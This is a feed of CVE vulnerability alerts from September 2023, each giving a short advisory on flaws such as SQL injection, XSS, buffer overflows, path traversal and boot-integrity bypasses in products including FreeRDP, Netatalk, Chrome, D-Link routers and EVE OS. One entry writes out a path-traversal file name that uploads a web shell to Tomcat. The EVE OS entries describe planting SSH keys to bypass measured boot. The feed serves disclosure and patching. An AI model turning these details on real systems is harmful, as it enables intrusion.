🚨 CVE-2023-40018FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.🎖@cveNotify |
|
| 2023-09-21 16:58:29 |
🚨 CVE-2022-20917A vulnerability in the Extensible Messaging and Presence Protocol (XMPP) message processing feature of Cisco Jabber could allow an authenticated, remote attacker to manipulate the content of XMPP messages that are used by the affected application. This vulnerability is due to the improper handling of nested XMPP messages within requests that are sent to the Cisco Jabber client software. An attacker could exploit this vulnerability by connecting to an XMPP messaging server and sending crafted XMPP messages to an affected Jabber client. A successful exploit could allow the attacker to manipulate the content of XMPP messages, possibly allowing the attacker to cause the Jabber client application to perform unsafe actions.🎖@cveNotify |
|
| 2023-09-21 16:58:28 |
🚨 CVE-2023-20194A vulnerability in the ERS API of Cisco ISE could allow an authenticated, remote attacker to read arbitrary files on the underlying operating system of an affected device. To exploit this vulnerability, an attacker must have valid Administrator-level privileges on the affected device. This vulnerability is due to improper privilege management in the ERS API. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to elevate their privileges beyond the sphere of their intended access level, which would allow them to obtain sensitive information from the underlying operating system. Note: The ERS is not enabled by default. To verify the status of the ERS API in the Admin GUI, choose Administration > Settings > API Settings > API Service Settings.🎖@cveNotify |
|
| 2023-09-21 16:58:27 |
🚨 CVE-2023-36160An issue was discovered in Qubo Smart Plug10A version HSP02_01_01_14_SYSTEM-10 A, allows local attackers to gain sensitive information and other unspecified impact via UART console.🎖@cveNotify |
|
| 2023-09-21 16:58:26 |
🚨 CVE-2023-43274Phpjabbers PHP Shopping Cart 4.2 is vulnerable to SQL Injection via the id parameter.🎖@cveNotify |
|
| 2023-09-21 16:58:24 |
🚨 CVE-2023-43309There is a stored cross-site scripting (XSS) vulnerability in Webmin 2.002 and below via the Cluster Cron Job tab Input field, which allows attackers to run malicious scripts by injecting a specially crafted payload.🎖@cveNotify |
|
| 2023-09-21 16:58:23 |
🚨 CVE-2023-43631On boot, the Pillar eve container checks for the existence and content of“/config/authorized_keys”.If the file is present, and contains a supported public key, the container will go on to openport 22 and enable sshd with the given keys as the authorized keys for root login.An attacker could easily add their own keys and gain full control over the system withouttriggering the “measured boot” mechanism implemented by EVE OS, and without markingthe device as “UUD” (“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable, andit is not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thus nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-21 16:58:22 |
🚨 CVE-2023-43632As noted in the “VTPM.md” file in the eve documentation, “VTPM is a server listening on port8877 in EVE, exposing limited functionality of the TPM to the clients. VTPM allows clients toexecute tpm2-tools binaries from a list of hardcoded options”The communication with this server is done using protobuf, and the data is comprised of 2parts:1. Header2. DataWhen a connection is made, the server is waiting for 4 bytes of data, which will be the header,and these 4 bytes would be parsed as uint32 size of the actual data to come.Then, in the function “handleRequest” this size is then used in order to allocate a payload onthe stack for the incoming data.As this payload is allocated on the stack, this will allow overflowing the stack size allocated forthe relevant process with freely controlled data.* An attacker can crash the system. * An attacker can gain control over the system, specifically on the “vtpm_server” processwhich has very high privileges.🎖@cveNotify |
|
| 2023-09-21 16:58:21 |
🚨 CVE-2023-43633On boot, the Pillar eve container checks for the existence and content of“/config/GlobalConfig/global.json”.If the file exists, it overrides the existing configuration on the device on boot.This allows an attacker to change the system’s configuration, which also includes somedebug functions.This could be used to unlock the ssh with custom “authorized_keys” via the“debug.enable.ssh” key, similar to the “authorized_keys” finding that was noted before.Other usages include unlocking the usb to enable the keyboard via the “debug.enable.usb”key, allowing VNC access via the “app.allow.vnc” key, and more.An attacker could easily enable these debug functionalities without triggering the “measuredboot” mechanism implemented by EVE OS, and without marking the device as “UUD”(“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable and itis not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thereby nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-21 16:58:20 |
🚨 CVE-2023-43634When sealing/unsealing the “vault” key, a list of PCRs is used, which defines which PCRsare used.In a previous project, CYMOTIVE found that the configuration is not protected by the secureboot, and in response Zededa implemented measurements on the config partition that wasmapped to PCR 13.In that process, PCR 13 was added to the list of PCRs that seal/unseal the key.In commit “56e589749c6ff58ded862d39535d43253b249acf”, the config partitionmeasurement moved from PCR 13 to PCR 14, but PCR 14 was not added to the list ofPCRs that seal/unseal the key.This change makes the measurement of PCR 14 effectively redundant as it would not affectthe sealing/unsealing of the key.An attacker could modify the config partition without triggering the measured boot, this couldresult in the attacker gaining full control over the device with full access to the contents of theencrypted “vault”🎖@cveNotify |
|
| 2023-09-21 16:58:19 |
🚨 CVE-2023-43637Due to the implementation of "deriveVaultKey", prior to version 7.10, the generated vault keywould always have the last 16 bytes predetermined to be "arfoobarfoobarfo".This issue happens because "deriveVaultKey" calls "retrieveCloudKey" (which will alwaysreturn "foobarfoobarfoobarfoobarfoobarfo" as the key), and then merges the 32byterandomly generated key with this key (by takeing 16bytes from each, see "mergeKeys").This makes the key a lot weaker.This issue does not persist in devices that were initialized on/after version 7.10, but devicesthat were initialized before that and updated to a newer version still have this issue.Roll an update that enforces the full 32bytes key usage.🎖@cveNotify |
|
| 2023-09-21 16:58:18 |
🚨 CVE-2023-36562Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-09-21 16:58:17 |
🚨 CVE-2023-38507Strapi is the an open-source headless content management system. Prior to version 4.12.1, there is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. Therefore, the possibility of unauthorized login by login brute force attack increases. Version 4.12.1 has a fix for this issue.🎖@cveNotify |
|
| 2023-09-21 14:58:44 |
🚨 CVE-2023-41030Hard-coded credentials in Juplink RX4-1500 versions V1.0.2 through V1.0.5 allow unauthenticated attackers to log in to the web interface or telnet service as the 'user' user.🎖@cveNotify |
|
| 2023-09-21 14:58:43 |
🚨 CVE-2020-24089An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-09-21 14:58:41 |
🚨 CVE-2023-36319File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.🎖@cveNotify |
|
| 2023-09-21 14:58:40 |
🚨 CVE-2023-39575A reflected cross-site scripting (XSS) vulnerability in the url_str URL parameter of ISL ARP Guard v4.0.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-09-21 14:58:38 |
🚨 CVE-2023-4095User enumeration vulnerability in Arconte Áurea 1.5.0.0 version. The exploitation of this vulnerability could allow an attacker to obtain a list of registered users in the application, obtaining the necessary information to perform more complex attacks on the platform.🎖@cveNotify |
|
| 2023-09-21 14:58:36 |
🚨 CVE-2023-4093Reflected and persistent XSS vulnerability in Arconte Áurea, in its 1.5.0.0 version. The exploitation of this vulnerability could allow an attacker to inject malicious JavaScript code, compromise the victim's browser and take control of it, redirect the user to malicious domains or access information being viewed by the legitimate user.🎖@cveNotify |
|
| 2023-09-21 14:58:34 |
🚨 CVE-2023-43235D-Link DIR-823G v1.0.2B05 was discovered to contain a stack overflow via parameter StartTime and EndTime in SetWifiDownSettings.🎖@cveNotify |
|
| 2023-09-21 14:58:33 |
🚨 CVE-2023-43236D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter statuscheckpppoeuser in dir_setWanWifi.🎖@cveNotify |
|
| 2023-09-21 14:58:31 |
🚨 CVE-2023-43237D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter macCloneMac in setMAC.🎖@cveNotify |
|
| 2023-09-21 14:58:30 |
🚨 CVE-2023-43238D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter nvmacaddr in form2Dhcpip.cgi.🎖@cveNotify |
|
| 2023-09-21 14:58:28 |
🚨 CVE-2023-43239D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter flag_5G in showMACfilterMAC.🎖@cveNotify |
|
| 2023-09-21 14:58:27 |
🚨 CVE-2023-43240D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter sip_address in ipportFilter.🎖@cveNotify |
|
| 2023-09-21 14:58:25 |
🚨 CVE-2023-43241D-Link DIR-823G v1.0.2B05 was discovered to contain a stack overflow via parameter TXPower and GuardInt in SetWLanRadioSecurity.🎖@cveNotify |
|
| 2023-09-21 14:58:23 |
🚨 CVE-2023-43242D-Link DIR-816 A2 v1.10CNB05 was discovered to contain a stack overflow via parameter removeRuleList in form2IPQoSTcDel.🎖@cveNotify |
|
| 2023-09-21 14:58:22 |
🚨 CVE-2023-41179A vulnerability in the 3rd party AV uninstaller module contained in Trend Micro Apex One (on-prem and SaaS), Worry-Free Business Security and Worry-Free Business Security Services could allow an attacker to manipulate the module to execute arbitrary commands on an affected installation.Note that an attacker must first obtain administrative console access on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-09-21 14:58:20 |
🚨 CVE-2023-31808Technicolor TG670 10.5.N.9 devices contain multiple accounts with hard-coded passwords. One account has administrative privileges, allowing for unrestricted access over the WAN interface if Remote Administration is enabled.🎖@cveNotify |
|
| 2023-09-21 14:58:19 |
🚨 CVE-2023-2995The Leyka WordPress plugin through 3.30.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-09-21 14:58:18 |
🚨 CVE-2023-4376The Serial Codes Generator and Validator with WooCommerce Support WordPress plugin before 2.4.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-09-21 14:58:17 |
🚨 CVE-2023-4092SQL injection vulnerability in Arconte Áurea, in its 1.5.0.0 version. The exploitation of this vulnerability could allow an attacker to read sensitive data from the database, modify data (insert/update/delete), perform database administration operations and, in some cases, execute commands on the operating system.🎖@cveNotify |
|
| 2023-09-21 14:58:15 |
🚨 CVE-2021-28485In Ericsson Mobile Switching Center Server (MSC-S) before IS 3.1 CP22, the SIS web application allows relative path traversal via a specific parameter in the https request after authentication, which allows access to files on the system that are not intended to be accessible via the web application.🎖@cveNotify |
|
| 2023-09-21 13:59:49 |
🚨 CVE-2023-4753OpenHarmony v3.2.1 and prior version has a liteos-a kernel may crash caused by mqueue undetected entries vulnerability. Local attackers can crash liteos-a kernel by the error input 🎖@cveNotify |
|
| 2023-09-21 12:00:22 |
🚨 CVE-2023-5104Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.🎖@cveNotify |
|
| 2023-09-21 12:00:20 |
🚨 CVE-2023-4760In Eclipse RAP versions from 3.0.0 up to and including 3.25.0, Remote Code Execution is possible on Windows when using the FileUpload component.The reason for this is a not completely secure extraction of the file name in the FileUploadProcessor.stripFileName(String name) method. As soon as this finds a / in the path, everything before it is removed, but potentially \ (backslashes) coming further back are kept.For example, a file name such as /..\..\webapps\shell.war can be used to upload a file to a Tomcat server under Windows, which is then saved as ..\..\webapps\shell.war in its webapps directory and can then be executed.🎖@cveNotify |
|
| 2023-09-21 12:00:19 |
🚨 CVE-2023-4152Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a path traversal vulnerability of the web interface by a crafted URL without authentication. This enables an remote attacker to read all files on the filesystem of the FDS101 device.🎖@cveNotify |
|
| 2023-09-21 12:00:18 |
🚨 CVE-2023-4291Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a remote code execution (RCE) vulnerability via manipulated parameters of the web interface without authentication. This could lead to a full compromise of the FDS101 device.🎖@cveNotify |
|
| 2023-09-21 12:00:17 |
🚨 CVE-2023-4292Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a SQL injection vulnerability via manipulated parameters of the web interface without authentication. The database contains limited, non-critical log information.🎖@cveNotify |
|
| 2023-09-21 12:00:16 |
🚨 CVE-2015-5467web\ViewAction in Yii (aka Yii2) 2.x before 2.0.5 allows attackers to execute any local .php file via a relative path in the view parameeter.🎖@cveNotify |
|
| 2023-09-21 12:00:15 |
🚨 CVE-2015-8371Composer before 2016-02-10 allows cache poisoning from other projects built on the same host. This results in attacker-controlled code entering a server-side build process. The issue occurs because of the way that dist packages are cached. The cache key is derived from the package name, the dist type, and certain other data from the package repository (which may simply be a commit hash, and thus can be found by an attacker). Versions through 1.0.0-alpha11 are affected, and 1.0.0 is unaffected.🎖@cveNotify |
|
| 2023-09-21 12:00:14 |
🚨 CVE-2018-5478Contao 3.x before 3.5.32 allows XSS via the unsubscribe module in the frontend newsletter extension.🎖@cveNotify |
|
| 2023-09-21 12:00:13 |
🚨 CVE-2023-39252Dell SCG Policy Manager 5.16.00.14 contains a broken cryptographic algorithm vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by performing MitM attacks and let attackers obtain sensitive information.🎖@cveNotify |
|
| 2023-09-21 12:00:12 |
🚨 CVE-2023-43669The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes).🎖@cveNotify |
|
| 2023-09-21 12:00:10 |
🚨 CVE-2023-42464A Type Confusion vulnerability was found in the Spotlight RPC functions in afpd in Netatalk 3.1.x before 3.1.17. When parsing Spotlight RPC packets, one encoded data structure is a key-value style dictionary where the keys are character strings, and the values can be any of the supported types in the underlying protocol. Due to a lack of type checking in callers of the dalloc_value_for_key() function, which returns the object associated with a key, a malicious actor may be able to fully control the value of the pointer and theoretically achieve Remote Code Execution on the host. This issue is similar to CVE-2023-34967.🎖@cveNotify |
|
| 2023-09-21 12:00:09 |
🚨 CVE-2022-43634This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dsi_writeinit function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-17646.🎖@cveNotify |
|
| 2023-09-21 12:00:07 |
🚨 CVE-2022-0194This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ad_addcomment function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15876.🎖@cveNotify |
|
| 2023-09-21 12:00:06 |
🚨 CVE-2022-23121This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parse_entries function. The issue results from the lack of proper error handling when parsing AppleDouble entries. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15819.🎖@cveNotify |
|
| 2023-09-21 12:00:05 |
🚨 CVE-2022-23122This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the setfilparams function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15837.🎖@cveNotify |
|
| 2023-09-21 12:00:04 |
🚨 CVE-2022-23123This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getdirparams method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15830.🎖@cveNotify |
|
| 2023-09-21 12:00:03 |
🚨 CVE-2022-23124This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the get_finderinfo method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15870.🎖@cveNotify |
|
| 2023-09-21 12:00:01 |
🚨 CVE-2022-45188Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).🎖@cveNotify |
|
| 2023-09-21 12:00:00 |
🚨 CVE-2021-31439This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation Manager. Authentication is not required to exploit this vulnerablity. The specific flaw exists within the processing of DSI structures in Netatalk. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12326.🎖@cveNotify |
|
| 2023-09-21 09:05:56 |
🚨 CVE-2023-4863Heap buffer overflow in WebP in Google Chrome prior to 116.0.5845.187 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-09-21 09:05:55 |
🚨 CVE-2023-40188FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `general_LumaToYUV444` function. This Out-Of-Bounds Read occurs because processing is done on the `in` variable without checking if it contains data of sufficient length. Insufficient data for the `in` variable may cause errors or crashes. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-09-21 09:05:54 |
🚨 CVE-2023-39356FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a missing offset validation may lead to an Out Of Bound Read in the function `gdi_multi_opaque_rect`. In particular there is no code to validate if the value `multi_opaque_rect->numRectangles` is less than 45. Looping through `multi_opaque_rect->`numRectangles without proper boundary checks can lead to Out-of-Bounds Read errors which will likely lead to a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-21 09:05:53 |
🚨 CVE-2023-40569FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Write in the `progressive_decompress` function. This issue is likely down to incorrect calculations of the `nXSrc` and `nYSrc` variables. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. there are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-21 09:05:49 |
🚨 CVE-2023-4763Use after free in Networks in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-21 09:05:48 |
🚨 CVE-2023-39354FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `nsc_rle_decompress_data` function. The Out-Of-Bounds Read occurs because it processes `context->Planes` without checking if it contains data of sufficient length. Should an attacker be able to leverage this vulnerability they may be able to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-21 09:05:47 |
🚨 CVE-2023-4762Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-21 09:05:43 |
🚨 CVE-2023-4761Out of bounds memory access in FedCM in Google Chrome prior to 116.0.5845.179 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-21 09:05:41 |
🚨 CVE-2023-40186FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an IntegerOverflow leading to Out-Of-Bound Write Vulnerability in the `gdi_CreateSurface` function. This issue affects FreeRDP based clients only. FreeRDP proxies are not affected as image decoding is not done by a proxy. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-09-21 09:05:40 |
🚨 CVE-2023-39353FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to a missing offset validation leading to Out Of Bound Read. In the `libfreerdp/codec/rfx.c` file there is no offset validation in `tile->quantIdxY`, `tile->quantIdxCb`, and `tile->quantIdxCr`. As a result crafted input can lead to an out of bounds read access which in turn will cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-21 09:05:37 |
🚨 CVE-2023-40589FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions there is a Global-Buffer-Overflow in the ncrush_decompress function. Feeding crafted input into this function can trigger the overflow which has only been shown to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-09-21 09:05:36 |
🚨 CVE-2023-4572Use after free in MediaStream in Google Chrome prior to 116.0.5845.140 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-21 09:05:35 |
🚨 CVE-2023-4428Out of bounds memory access in CSS in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-21 00:58:15 |
🚨 CVE-2023-36109Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.🎖@cveNotify |
|
| 2023-09-21 00:58:14 |
🚨 CVE-2023-37279Faktory is a language-agnostic persistent background job server. Prior to version 1.8.0, the Faktory web dashboard can suffer from denial of service by a crafted malicious url query param `days`. The vulnerability is related to how the backend reads the `days` URL query parameter in the Faktory web dashboard. The value is used directly without any checks to create a string slice. If a very large value is provided, the backend server ends up using a significant amount of memory and causing it to crash. Version 1.8.0 fixes this issue.🎖@cveNotify |
|
| 2023-09-21 00:58:13 |
🚨 CVE-2023-43135There is an unauthorized access vulnerability in TP-LINK ER5120G 4.0 2.0.0 Build 210817 Rel.80868n, which allows attackers to obtain sensitive information of the device without authentication, obtain user tokens, and ultimately log in to the device backend management.🎖@cveNotify |
|
| 2023-09-20 22:58:38 |
🚨 CVE-2023-39046An information leak in TonTon-Tei_waiting Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-20 22:58:37 |
🚨 CVE-2023-35851SUNNET WMPro portal's FAQ function has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL commands to obtain sensitive information via a database.🎖@cveNotify |
|
| 2023-09-20 22:58:35 |
🚨 CVE-2023-35850SUNNET WMPro portal's file management function has a vulnerability of insufficient filtering for user input. A remote attacker with administrator privilege or a privileged account can exploit this vulnerability to inject and execute arbitrary system commands to perform arbitrary system operations or disrupt service.🎖@cveNotify |
|
| 2023-09-20 22:58:34 |
🚨 CVE-2023-0923A flaw was found in the Kubernetes service for notebooks in RHODS, where it does not prevent pods from other namespaces and applications from making requests to the Jupyter API. This flaw can lead to file content exposure and other issues.🎖@cveNotify |
|
| 2023-09-20 22:58:33 |
🚨 CVE-2023-41443SQL injection vulnerability in Novel-Plus v.4.1.0 allows a remote attacker to execute arbitrary code via a crafted script to the sort parameter in /sys/menu/list.🎖@cveNotify |
|
| 2023-09-20 22:58:32 |
🚨 CVE-2021-26837SQL Injection vulnerability in SearchTextBox parameter in Fortra (Formerly HelpSystems) DeliverNow before version 1.2.18, allows attackers to execute arbitrary code, escalate privileges, and gain sensitive information.🎖@cveNotify |
|
| 2023-09-20 22:58:31 |
🚨 CVE-2023-0813A flaw was found in the Network Observability plugin for OpenShift console. Unless the Loki authToken configuration is set to FORWARD mode, authentication is no longer enforced, allowing any user who can connect to the OpenShift Console in an OpenShift cluster to retrieve flows without authentication.🎖@cveNotify |
|
| 2023-09-20 22:58:29 |
🚨 CVE-2023-40167Jetty is a Java based web server and servlet engine. Prior to versions 9.4.52, 10.0.16, 11.0.16, and 12.0.1, Jetty accepts the `+` character proceeding the content-length value in a HTTP/1 header field. This is more permissive than allowed by the RFC and other servers routinely reject such requests with 400 responses. There is no known exploit scenario, but it is conceivable that request smuggling could result if jetty is used in combination with a server that does not close the connection after sending such a 400 response. Versions 9.4.52, 10.0.16, 11.0.16, and 12.0.1 contain a patch for this issue. There is no workaround as there is no known exploit scenario.🎖@cveNotify |
|
| 2023-09-20 22:58:28 |
🚨 CVE-2022-3596An information leak was found in OpenStack's undercloud. This flaw allows unauthenticated, remote attackers to inspect sensitive data after discovering the IP address of the undercloud, possibly leading to compromising private information, including administrator access credentials.🎖@cveNotify |
|
| 2023-09-20 22:58:27 |
🚨 CVE-2023-39052An information leak in Earthgarden_waiting 13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-20 22:58:26 |
🚨 CVE-2023-40930Skyworth 3.0 OS is vulnerable to Directory Traversal.🎖@cveNotify |
|
| 2023-09-20 22:58:24 |
🚨 CVE-2023-41484An issue in cimg.eu Cimg Library v2.9.3 allows an attacker to obtain sensitive information via a crafted JPEG file.🎖@cveNotify |
|
| 2023-09-20 22:58:23 |
🚨 CVE-2023-42331A file upload vulnerability in EliteCMS 1.01 allows a remote attacker to execute arbitrary code via the manage_uploads.php component.🎖@cveNotify |
|
| 2023-09-20 22:58:22 |
🚨 CVE-2023-42334An Indirect Object Reference (IDOR) in Fl3xx Dispatch 2.10.37 and fl3xx Crew 2.10.37 allows a remote attacker to escalate privileges via the user parameter.🎖@cveNotify |
|
| 2023-09-20 22:58:21 |
🚨 CVE-2023-42335Unrestricted File Upload vulnerability in Fl3xx Dispatch 2.10.37 and fl3xx Crew 2.10.37 allows a remote attacker to execute arbitrary code via the add attachment function in the New Expense component.🎖@cveNotify |
|
| 2023-09-20 22:58:17 |
🚨 CVE-2023-43134There is an unauthorized access vulnerability in Netis 360RAC1200 v1.3.4517, which allows attackers to obtain sensitive information of the device without authentication, obtain user tokens, and ultimately log in to the device backend management.🎖@cveNotify |
|
| 2023-09-20 22:58:16 |
🚨 CVE-2023-43137TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds ACL rules after authentication, and the rule name parameter has injection points.🎖@cveNotify |
|
| 2023-09-20 22:58:15 |
🚨 CVE-2023-43138TPLINK TL-ER5120G 4.0 2.0.0 Build 210817 Rel.80868n has a command injection vulnerability, when an attacker adds NAPT rules after authentication, and the rule name has an injection point.🎖@cveNotify |
|
| 2023-09-20 22:58:14 |
🚨 CVE-2023-37410IBM Personal Communications 14.05, 14.06, and 15.0.0 could allow a local user to escalate their privileges to the SYSTEM user due to overly permissive access controls. IBM X-Force ID: 260138.🎖@cveNotify |
|
| 2023-09-20 22:58:13 |
🚨 CVE-2023-39045An information leak in kokoroe_members card Line 13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-20 21:58:49 |
🚨 CVE-2023-40368IBM Storage Protect 8.1.0.0 through 8.1.19.0 could allow a privileged user to obtain sensitive information from the administrative command line client. IBM X-Force ID: 263456.🎖@cveNotify |
|
| 2023-09-20 21:58:48 |
🚨 CVE-2023-43371Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the numcaselle parameter at /hoteldruid/creaprezzi.php.🎖@cveNotify |
|
| 2023-09-20 21:58:47 |
🚨 CVE-2023-43373Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php.🎖@cveNotify |
|
| 2023-09-20 21:58:46 |
🚨 CVE-2023-43374Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.🎖@cveNotify |
|
| 2023-09-20 21:58:45 |
🚨 CVE-2023-43375Hoteldruid v3.0.5 was discovered to contain multiple SQL injection vulnerabilities at /hoteldruid/clienti.php via the annonascita, annoscaddoc, giornonascita, giornoscaddoc, lingua_cli, mesenascita, and mesescaddoc parameters.🎖@cveNotify |
|
| 2023-09-20 21:58:41 |
🚨 CVE-2023-43376A cross-site scripting (XSS) vulnerability in /hoteldruid/clienti.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the nometipotariffa1 parameter.🎖@cveNotify |
|
| 2023-09-20 21:58:40 |
